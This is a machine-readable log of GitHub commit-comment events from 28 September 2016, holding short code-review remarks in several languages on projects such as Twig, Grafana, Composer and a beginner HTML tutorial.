{"id":"4631088047","type":"CommitCommentEvent","actor":{"login":"pjmolina"},"repo":{"name":"pjmolina/app1"},"payload":{"comment":{"id":19208320,"position":4,"line":12,"path":"App1/Properties/AssemblyInfo.cs","commit_id":"f30621335252f74aa23dea90c2ab2a7e1842e8a2","created_at":"2016-09-28T14:36:46Z","updated_at":"2016-09-28T14:36:46Z","body":"Comentario"}},"created_at":"2016-09-28T14:36:46Z"}
{"id":"4631088096","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208321,"position":9,"line":8,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:36:46Z","updated_at":"2016-09-28T14:36:46Z","body":"I've listed the `h2` and `h3` outside of the `ul`.  Only `li` tags should be the direct children of a `ul`.  You can put headers inside of `li`'s however!  Any code directly inside a `ul` or an `ol` might not behave the way you expect them too in all browsers as browsers like to apply their own twist to `ul` and `ol`.  "}},"created_at":"2016-09-28T14:36:46Z"}
{"id":"4631088693","type":"CommitCommentEvent","actor":{"login":"motorkey"},"repo":{"name":"Atsukyyy/sample_app"},"payload":{"comment":{"id":19208326,"position":9,"line":8,"path":"app/views/users/new.html.erb","commit_id":"8a97e6dc03ce4e27b78d8c49af3f423f36ae7ef4","created_at":"2016-09-28T14:36:52Z","updated_at":"2016-09-28T14:36:52Z","body":"インデントがおかしい。修正を。"}},"created_at":"2016-09-28T14:36:52Z"}
{"id":"4631089670","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208331,"position":12,"line":10,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:37:01Z","updated_at":"2016-09-28T14:37:01Z","body":"Skip all this red."}},"created_at":"2016-09-28T14:37:01Z"}
{"id":"4631094474","type":"CommitCommentEvent","actor":{"login":"jimgi"},"repo":{"name":"jimgi/Hello-World"},"payload":{"comment":{"id":19208337,"position":null,"line":null,"path":null,"commit_id":"8765da877a7f83d1326dbec91dc298b868337514","created_at":"2016-09-28T14:37:42Z","updated_at":"2016-09-28T14:37:42Z","body":"Split to update."}},"created_at":"2016-09-28T14:37:42Z"}
{"id":"4631095068","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208339,"position":106,"line":10,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:37:47Z","updated_at":"2016-09-28T14:37:47Z","body":"You'll see that only `li` are the direct children of `ul` now.  This will give you more consistent code."}},"created_at":"2016-09-28T14:37:47Z"}
{"id":"4631095445","type":"CommitCommentEvent","actor":{"login":"DonnEssime"},"repo":{"name":"DonnEssime/Custom-Salem"},"payload":{"comment":{"id":19208340,"position":null,"line":null,"path":null,"commit_id":"0c573ae3bb73f72203a4b8a9b10ffdbc31942969","created_at":"2016-09-28T14:37:50Z","updated_at":"2016-09-28T14:37:50Z","body":"Kindly don't use Russian in commits you plan on sending upstream :) commit is fine, will merge"}},"created_at":"2016-09-28T14:37:50Z"}
{"id":"4631096215","type":"CommitCommentEvent","actor":{"login":"cfbolz"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208341,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:37:56Z","updated_at":"2016-09-28T14:37:56Z","body":"makes no difference to me whether I run them with pypy or python, btw. Do you have some kind of special ``PYTHONPATH`` set, eg does it contain ``.``?"}},"created_at":"2016-09-28T14:37:56Z"}
{"id":"4631096574","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19208342,"position":null,"line":null,"path":null,"commit_id":"9b8deb404d61a392743fd0c0ef7c5ba3476a0444","created_at":"2016-09-28T14:37:59Z","updated_at":"2016-09-28T14:37:59Z","body":"There was actually a bug in the liquid template. Fixed in ced8f0f967c1550e1ca809bda9e177944fecc814"}},"created_at":"2016-09-28T14:37:59Z"}
{"id":"4631098273","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19208345,"position":213,"line":213,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-28T14:38:14Z","updated_at":"2016-09-28T14:38:14Z","body":"it sounds good."}},"created_at":"2016-09-28T14:38:14Z"}
{"id":"4631105880","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19208366,"position":null,"line":null,"path":null,"commit_id":"22a875c5509dc2b746a9b0307f8a482f14332603","created_at":"2016-09-28T14:39:19Z","updated_at":"2016-09-28T14:39:19Z","body":"\nBuild report #163418695 for sha 22a875c5509dc2b746a9b0307f8a482f14332603:\n\n[![UnitTests](https://img.shields.io/badge/unittests-failed%20%281/6%29%20-red.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-17.83%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3756%20/%2010050%20%2837.37%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-36.86%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-28T14:39:19Z"}
{"id":"4631106290","type":"CommitCommentEvent","actor":{"login":"snim2"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208369,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:39:23Z","updated_at":"2016-09-28T14:39:23Z","body":"Ah, I do have `.` in my `PYTHONPATH`, that's probably it. \r\n\r\nDo you want to change the other scripts here or raise an issue and I'll do it when I'm out of metings."}},"created_at":"2016-09-28T14:39:23Z"}
{"id":"4631108405","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"brunoqcx/EDL"},"payload":{"comment":{"id":19208373,"position":null,"line":null,"path":null,"commit_id":"eb329b9e7743c685dd9f12479ba85cb91e0c0868","created_at":"2016-09-28T14:39:43Z","updated_at":"2016-09-28T14:39:43Z","body":"O exercício pede pra usar a sintaxe de markdown..."}},"created_at":"2016-09-28T14:39:43Z"}
{"id":"4631108840","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/resque"},"payload":{"comment":{"id":19208374,"position":null,"line":null,"path":null,"commit_id":"8391f216d1271f3f8710599246d6c55fdf6dee30","created_at":"2016-09-28T14:39:47Z","updated_at":"2016-09-28T14:39:47Z","body":"Marked as reviewed without looking at the code."}},"created_at":"2016-09-28T14:39:47Z"}
{"id":"4631109283","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"StarcounterSamples/Chatter"},"payload":{"comment":{"id":19208375,"position":17,"line":39,"path":"ViewModels/ChatGroupPage.json.cs","commit_id":"aee69f94620917ddf892973dc5aedfd9ea418ac2","created_at":"2016-09-28T14:39:51Z","updated_at":"2016-09-28T14:39:51Z","body":"Fixed in https://github.com/StarcounterSamples/Chatter/commit/cddb63bf2c428e8cdbf01b821354d3cf6d88bd31. Do you think it can be fixed even better?"}},"created_at":"2016-09-28T14:39:51Z"}
{"id":"4631109472","type":"CommitCommentEvent","actor":{"login":"DonnEssime"},"repo":{"name":"DonnEssime/Custom-Salem"},"payload":{"comment":{"id":19208376,"position":null,"line":null,"path":null,"commit_id":"e5a2bbf47f5a214494a2f27bc53e830b3716f753","created_at":"2016-09-28T14:39:52Z","updated_at":"2016-09-28T14:39:52Z","body":"This is not intended i think. Split up commits on different things into different pull requests. Obviously i won't merge these changes."}},"created_at":"2016-09-28T14:39:52Z"}
{"id":"4631109727","type":"CommitCommentEvent","actor":{"login":"apapsch"},"repo":{"name":"twigphp/Twig"},"payload":{"comment":{"id":19208378,"position":25,"line":264,"path":"lib/Twig/Loader/Filesystem.php","commit_id":"6f0e3edbc55a7ce0464fa0ec90462d66822e0750","created_at":"2016-09-28T14:39:55Z","updated_at":"2016-09-28T14:39:55Z","body":"This produces invalid phar URLs, thus preventing me from loading templates from phar archives. Example:\r\nphar:///foo/bar is turned into phar:/foo/bar.\r\n\r\nnormalizePath should either not drop consective slashes at all[0] or take special care not to mangle URLs.\r\n\r\n[0] Why is it done anyway? Underlying infrastructure should take care of it themselfs. For example, file_get_contents handles consecutive slashes just fine."}},"created_at":"2016-09-28T14:39:55Z"}
{"id":"4631110134","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"StarcounterSamples/Chatter"},"payload":{"comment":{"id":19208382,"position":12,"line":34,"path":"ViewModels/ChatGroupPage.json.cs","commit_id":"aee69f94620917ddf892973dc5aedfd9ea418ac2","created_at":"2016-09-28T14:39:58Z","updated_at":"2016-09-28T14:39:58Z","body":"Fixed in https://github.com/StarcounterSamples/Chatter/commit/cddb63bf2c428e8cdbf01b821354d3cf6d88bd31"}},"created_at":"2016-09-28T14:39:58Z"}
{"id":"4631110675","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/resque"},"payload":{"comment":{"id":19208383,"position":null,"line":null,"path":null,"commit_id":"db4d29a857e463ac6249d7b13842cc33da07d171","created_at":"2016-09-28T14:40:03Z","updated_at":"2016-09-28T14:40:03Z","body":"Marked as reviewed without looking at the code."}},"created_at":"2016-09-28T14:40:03Z"}
{"id":"4631111902","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"satishgoda/Maya"},"payload":{"comment":{"id":19208388,"position":null,"line":null,"path":null,"commit_id":"a6134ba1d09e222408c61d6abff86b72b10eec60","created_at":"2016-09-28T14:40:14Z","updated_at":"2016-09-28T14:40:14Z","body":"qtpanel.focusWidget().hide()\r\n\r\nqtpanel.focusWidget().show()\r\n\r\nqtpanel.focusWidget().parent().parent().count()\r\n\r\nqtpanel.focusWidget().children()[-1].children()[-1]"}},"created_at":"2016-09-28T14:40:14Z"}
{"id":"4631114722","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208396,"position":108,"line":12,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:40:39Z","updated_at":"2016-09-28T14:40:39Z","body":"You used to have `<span class=\"bold\">` tags on these lines.  HTML has evolved to give us a faster way of doing this!  `<strong>` applies a **bold** and `<em>` applies _italics_ (short for emphasis).  Less code to write and smaller files sizes!  You can also apply other css to these using the same kind of selector.  Say you also wanted all your bold text to be slightly larger as well.  You could do this in the css:\r\n```css\r\nstrong {\r\n   font-size: 1.1em;\r\n}\r\n```"}},"created_at":"2016-09-28T14:40:39Z"}
{"id":"4631115921","type":"CommitCommentEvent","actor":{"login":"dewi2a1"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":19208397,"position":null,"line":null,"path":null,"commit_id":"6bd9a969315a17d26d258cba7c2fc50b5be11523","created_at":"2016-09-28T14:40:49Z","updated_at":"2016-09-28T14:40:49Z","body":"Sorry Albert, did you use Theano 0.7?\r\nBecause I think on Theano 0.8, downsample already move to pool.\r\nThat's why I change it to the newest one."}},"created_at":"2016-09-28T14:40:49Z"}
{"id":"4631116672","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19208398,"position":33,"line":73,"path":"public/app/plugins/datasource/prometheus/datasource.ts","commit_id":"add9e7e3a03ad519156758a8e63944db0516586d","created_at":"2016-09-28T14:40:56Z","updated_at":"2016-09-28T14:40:56Z","body":"ok, then a more full prometheus expression parser might be needed in order to insert the ad hoc filters"}},"created_at":"2016-09-28T14:40:56Z"}
{"id":"4631117474","type":"CommitCommentEvent","actor":{"login":"jasonliul"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19208401,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-28T14:41:03Z","updated_at":"2016-09-28T14:41:03Z","body":"@henrypp \r\nПожалуйста."}},"created_at":"2016-09-28T14:41:03Z"}
{"id":"4631119843","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/Interact.jl"},"payload":{"comment":{"id":19208406,"position":12,"line":9,"path":"deps/build.jl","commit_id":"ed4f52574f71c1c5f6f2a4c797ec61ceaf3aced9","created_at":"2016-09-28T14:41:26Z","updated_at":"2016-09-28T14:41:26Z","body":"what's the point of warning unconditionally on windows? this will just confuse ussrs for no good reason."}},"created_at":"2016-09-28T14:41:26Z"}
{"id":"4631121023","type":"CommitCommentEvent","actor":{"login":"JaimePPD"},"repo":{"name":"pjmolina/app1"},"payload":{"comment":{"id":19208408,"position":4,"line":12,"path":"App1/Properties/AssemblyInfo.cs","commit_id":"f30621335252f74aa23dea90c2ab2a7e1842e8a2","created_at":"2016-09-28T14:41:35Z","updated_at":"2016-09-28T14:41:35Z","body":"Respuesta a comentario"}},"created_at":"2016-09-28T14:41:35Z"}
{"id":"4631122833","type":"CommitCommentEvent","actor":{"login":"snim2"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208410,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:41:50Z","updated_at":"2016-09-28T14:41:50Z","body":"Raised #170"}},"created_at":"2016-09-28T14:41:50Z"}
{"id":"4631123481","type":"CommitCommentEvent","actor":{"login":"gonebeta"},"repo":{"name":"lifeinthegrid/duplicator"},"payload":{"comment":{"id":19208411,"position":null,"line":null,"path":null,"commit_id":"9a732877be0a3cad8ff30681919ef03ea78defec","created_at":"2016-09-28T14:41:56Z","updated_at":"2016-09-28T14:41:56Z","body":"Thanks! "}},"created_at":"2016-09-28T14:41:56Z"}
{"id":"4631124332","type":"CommitCommentEvent","actor":{"login":"wyattjoh"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208413,"position":27,"line":40,"path":"cmd/sponged/handlers/data.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:42:04Z","updated_at":"2016-09-28T14:42:04Z","body":"Changing this doesn't seem to add anything in my opinion."}},"created_at":"2016-09-28T14:42:04Z"}
{"id":"4631124338","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208414,"position":115,"line":19,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:42:05Z","updated_at":"2016-09-28T14:42:05Z","body":"The `verseStyle` used to be in `span` tags that followed a `br` tag.  Using divs will be more flexible.  `br`'s are actually very very very rarely used anymore as they make the webpage less flexible.  I can explain further if you want."}},"created_at":"2016-09-28T14:42:05Z"}
{"id":"4631124905","type":"CommitCommentEvent","actor":{"login":"Blumenkranz"},"repo":{"name":"leomisfits/LP1E5"},"payload":{"comment":{"id":19208419,"position":null,"line":null,"path":null,"commit_id":"cfc49b6e0c599aa29a2cbc14de08c431d548cd1f","created_at":"2016-09-28T14:42:10Z","updated_at":"2016-09-28T14:42:10Z","body":"lucas pediu\r\n"}},"created_at":"2016-09-28T14:42:10Z"}
{"id":"4631126207","type":"CommitCommentEvent","actor":{"login":"sushama-kumari"},"repo":{"name":"sushama-kumari/sampleRepository"},"payload":{"comment":{"id":19208424,"position":null,"line":null,"path":null,"commit_id":"93f8f671f15c70b8adbd4201ece1779709102bc4","created_at":"2016-09-28T14:42:20Z","updated_at":"2016-09-28T14:42:20Z","body":"readme trial"}},"created_at":"2016-09-28T14:42:20Z"}
{"id":"4631128471","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/Interact.jl"},"payload":{"comment":{"id":19208431,"position":9,"line":6,"path":"deps/build.jl","commit_id":"ed4f52574f71c1c5f6f2a4c797ec61ceaf3aced9","created_at":"2016-09-28T14:42:39Z","updated_at":"2016-09-28T14:42:39Z","body":"`which` is not guaranteed to be installed on linux"}},"created_at":"2016-09-28T14:42:39Z"}
{"id":"4631129341","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterSamples/Chatter"},"payload":{"comment":{"id":19208433,"position":17,"line":39,"path":"ViewModels/ChatGroupPage.json.cs","commit_id":"aee69f94620917ddf892973dc5aedfd9ea418ac2","created_at":"2016-09-28T14:42:45Z","updated_at":"2016-09-28T14:42:45Z","body":"I think in new commit it is perfect :)"}},"created_at":"2016-09-28T14:42:45Z"}
{"id":"4631129888","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19208435,"position":12,"line":12,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"43b14b6d069ecc777e94867ce2e610e14e4f44d7","created_at":"2016-09-28T14:42:50Z","updated_at":"2016-09-28T14:42:50Z","body":"Pode simplificar e fazer direto o return:\r\n\r\n```Java\r\nreturn quantidade > 2 && quantidade % 2 == 0;\r\n```"}},"created_at":"2016-09-28T14:42:50Z"}
{"id":"4631130018","type":"CommitCommentEvent","actor":{"login":"motorkey"},"repo":{"name":"Atsukyyy/sample_app"},"payload":{"comment":{"id":19208436,"position":null,"line":null,"path":null,"commit_id":"8a97e6dc03ce4e27b78d8c49af3f423f36ae7ef4","created_at":"2016-09-28T14:42:51Z","updated_at":"2016-09-28T14:42:51Z","body":"コメント箇所以外にもインデントがおかしい場所は適宜、半角空白2文字に直すこと。"}},"created_at":"2016-09-28T14:42:51Z"}
{"id":"4631130318","type":"CommitCommentEvent","actor":{"login":"vext01"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208439,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:42:54Z","updated_at":"2016-09-28T14:42:54Z","body":"I did a similar fix in the plotting script after me moved stuff to bin/"}},"created_at":"2016-09-28T14:42:54Z"}
{"id":"4631131885","type":"CommitCommentEvent","actor":{"login":"wyattjoh"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208442,"position":6,"line":51,"path":"cmd/sponged/tests/data_test.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:43:09Z","updated_at":"2016-09-28T14:43:09Z","body":"Should compare against `http.StatusOK` and not a raw int."}},"created_at":"2016-09-28T14:43:09Z"}
{"id":"4631132104","type":"CommitCommentEvent","actor":{"login":"heukirne"},"repo":{"name":"vwoloszyn/MHR"},"payload":{"comment":{"id":19208445,"position":null,"line":null,"path":null,"commit_id":"d1de6e0d131516c966e1f33fd9d4f0314451f7b1","created_at":"2016-09-28T14:43:11Z","updated_at":"2016-09-28T14:43:11Z","body":"@vwoloszyn vê se estão certas as contagens..."}},"created_at":"2016-09-28T14:43:11Z"}
{"id":"4631132446","type":"CommitCommentEvent","actor":{"login":"josephg5"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":19208447,"position":null,"line":null,"path":null,"commit_id":"dacab57e33c5cf272aa95607ebfcbc4ff927703f","created_at":"2016-09-28T14:43:14Z","updated_at":"2016-09-28T14:43:14Z","body":"hi prometheanfire, \r\n\r\nbecause upstream likes to remove stuff ;) those links need to be updated:\r\nhttp://repository.spotify.com/pool/non-free/s/spotify-client/spotify-client_1.0.38.171.g5e1cd7b2-22_amd64.deb\r\nhttp://repository.spotify.com/pool/non-free/s/spotify-client/spotify-client_1.0.38.171.g5e1cd7b2-22_i386.deb\r\n\r\nwith perhaps a version bump?\r\nthanks, joseph"}},"created_at":"2016-09-28T14:43:14Z"}
{"id":"4631136301","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208458,"position":321,"line":225,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:43:47Z","updated_at":"2016-09-28T14:43:47Z","body":"I missed fixing this in the code, but anytime you want to use an ampersand in html, you should replace it with `&amp;`.  The `&` means something in code."}},"created_at":"2016-09-28T14:43:47Z"}
{"id":"4631136723","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19208459,"position":33,"line":33,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-28T14:43:51Z","updated_at":"2016-09-28T14:43:51Z","body":"For the default value, as you preferred. I have no strong opinion. I agree we should make it configurable."}},"created_at":"2016-09-28T14:43:51Z"}
{"id":"4631137135","type":"CommitCommentEvent","actor":{"login":"wyattjoh"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208461,"position":47,"line":47,"path":"internal/sponge/sponge.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:43:55Z","updated_at":"2016-09-28T14:43:55Z","body":"Function name wrong in log call."}},"created_at":"2016-09-28T14:43:55Z"}
{"id":"4631138213","type":"CommitCommentEvent","actor":{"login":"sneakybeaky"},"repo":{"name":"npryce/adr-tools"},"payload":{"comment":{"id":19208463,"position":null,"line":null,"path":null,"commit_id":"1d379e0d86a201b64d2f0f5f30d825877e56ec00","created_at":"2016-09-28T14:44:04Z","updated_at":"2016-09-28T14:44:04Z","body":"Unfortunately this change breaks the commands on OS X : \r\n\r\n    $ adr help\r\n    usage: /Users/jonbarber/adr-tools/src/adr-help COMMAND [ARG] ...\r\n    COMMAND is one of:\r\n    find: -perm: /111: illegal mode string\r\n    Run 'adr help COMMAND' for help on a specific command."}},"created_at":"2016-09-28T14:44:04Z"}
{"id":"4631140350","type":"CommitCommentEvent","actor":{"login":"thinkfull"},"repo":{"name":"thinkfull/Workspaces"},"payload":{"comment":{"id":19208469,"position":null,"line":null,"path":null,"commit_id":"b34375bf783a7133cda554b6809e8b512b9a07df","created_at":"2016-09-28T14:44:22Z","updated_at":"2016-09-28T14:44:22Z","body":"yes do you thinkfull2"}},"created_at":"2016-09-28T14:44:22Z"}
{"id":"4631141463","type":"CommitCommentEvent","actor":{"login":"jde"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208474,"position":29,"line":29,"path":"internal/sponge/sponge.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:44:31Z","updated_at":"2016-09-28T14:44:31Z","body":"Should this comment be on the DeepEqual, not the if?"}},"created_at":"2016-09-28T14:44:31Z"}
{"id":"4631142845","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19208481,"position":22,"line":39,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"43b14b6d069ecc777e94867ce2e610e14e4f44d7","created_at":"2016-09-28T14:44:44Z","updated_at":"2016-09-28T14:44:44Z","body":"Mas onde entra a parte em que o Dwarf perde a vida quando recebe a flechada?"}},"created_at":"2016-09-28T14:44:44Z"}
{"id":"4631144915","type":"CommitCommentEvent","actor":{"login":"FredrIQ"},"repo":{"name":"roukaour/pokecrystal"},"payload":{"comment":{"id":19208489,"position":null,"line":null,"path":null,"commit_id":"4638b6faf5f302f1131f8ec87bb893a0f82cf330","created_at":"2016-09-28T14:45:02Z","updated_at":"2016-09-28T14:45:02Z","body":"callab and callba does the same thing (Technically not quite, but the change is so minor that they effectively work the same, it only exist for ROM consistency with original Crystal in pret). Was the change deliberate?\r\nThere is also a \"farcall\" alias which is a bit more self-explanatory. Should I settle on using farcall in the future for consistency? Or one of the other 2 choices?"}},"created_at":"2016-09-28T14:45:02Z"}
{"id":"4631147523","type":"CommitCommentEvent","actor":{"login":"jde"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208495,"position":null,"line":null,"path":null,"commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:45:24Z","updated_at":"2016-09-28T14:45:24Z","body":"+1 to refactoring the item and graph work into a single import function and bringing it into internal. Items and quads go hand in hand so it makes perfect sense to provide a single func to do this. Also, cuts down on a ton of redundant handler tests."}},"created_at":"2016-09-28T14:45:24Z"}
{"id":"4631148135","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208497,"position":27,"line":40,"path":"cmd/sponged/handlers/data.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:45:28Z","updated_at":"2016-09-28T14:45:28Z","body":"@wyattjoh a request from Bill. I think both are fine, but not strongly tied to one or the other.  So happy to change."}},"created_at":"2016-09-28T14:45:28Z"}
{"id":"4631148622","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208499,"position":323,"line":106,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:45:33Z","updated_at":"2016-09-28T14:45:33Z","body":"I just put some carriage returns so that the divs were on their own lines above and below the code.  Getting in the habit of putting longer lines of code into several lines of nested code will save you so many headaches down the line as it becomes easier to see where a missing closing tag might be.  The other way isn't wrong however, so it's up to you."}},"created_at":"2016-09-28T14:45:33Z"}
{"id":"4631149570","type":"CommitCommentEvent","actor":{"login":"dwhitena"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208502,"position":6,"line":51,"path":"cmd/sponged/tests/data_test.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:45:41Z","updated_at":"2016-09-28T14:45:41Z","body":"Yes."}},"created_at":"2016-09-28T14:45:41Z"}
{"id":"4631150212","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19208504,"position":195,"line":218,"path":"pagespeed/system/redis_cache_cluster_test.cc","commit_id":"75fb7f5a261674c0107b25cd97f4d6f530e601e1","created_at":"2016-09-28T14:45:47Z","updated_at":"2016-09-28T14:45:47Z","body":"Doing this in `TestCaseSetup` (which is static and runs once before the tests) and then again in `RedisCacheClusterTestWithReconfiguration::TearDown` seems right to me?"}},"created_at":"2016-09-28T14:45:47Z"}
{"id":"4631150328","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19208505,"position":null,"line":null,"path":null,"commit_id":"61648ba4c3b33c93917f08e14d2101ba5e6edec7","created_at":"2016-09-28T14:45:48Z","updated_at":"2016-09-28T14:45:48Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33585/testReport/) for this commit**"}},"created_at":"2016-09-28T14:45:48Z"}
{"id":"4631151684","type":"CommitCommentEvent","actor":{"login":"wyattjoh"},"repo":{"name":"coralproject/shelf"},"payload":{"comment":{"id":19208509,"position":27,"line":40,"path":"cmd/sponged/handlers/data.go","commit_id":"38e10e9a13b8d35409897b25020703c660799b18","created_at":"2016-09-28T14:45:59Z","updated_at":"2016-09-28T14:45:59Z","body":"Leave it if that's the case."}},"created_at":"2016-09-28T14:45:59Z"}
{"id":"4631151814","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":19208510,"position":null,"line":null,"path":null,"commit_id":"c7e1f49e783f92960441b88fe23bc1e933797daa","created_at":"2016-09-28T14:46:00Z","updated_at":"2016-09-28T14:46:00Z","body":"Hey @naderman, I just did some blackfire profiling to try to help you guys find some more bottlenecks. While doing this I found this commit. Do you still think it's correct. Imho `getHash()` is only used in `RuleSet`, yes. But it's used in `RuleSet::containsEqual()` as well as `RuleSet::add()`."}},"created_at":"2016-09-28T14:46:00Z"}
{"id":"4631153837","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19208513,"position":74,"line":71,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"43b14b6d069ecc777e94867ce2e610e14e4f44d7","created_at":"2016-09-28T14:46:19Z","updated_at":"2016-09-28T14:46:19Z","body":"cuidado com o nome da variável, no padrão Java deve ser com a primeira letra minúscula."}},"created_at":"2016-09-28T14:46:19Z"}
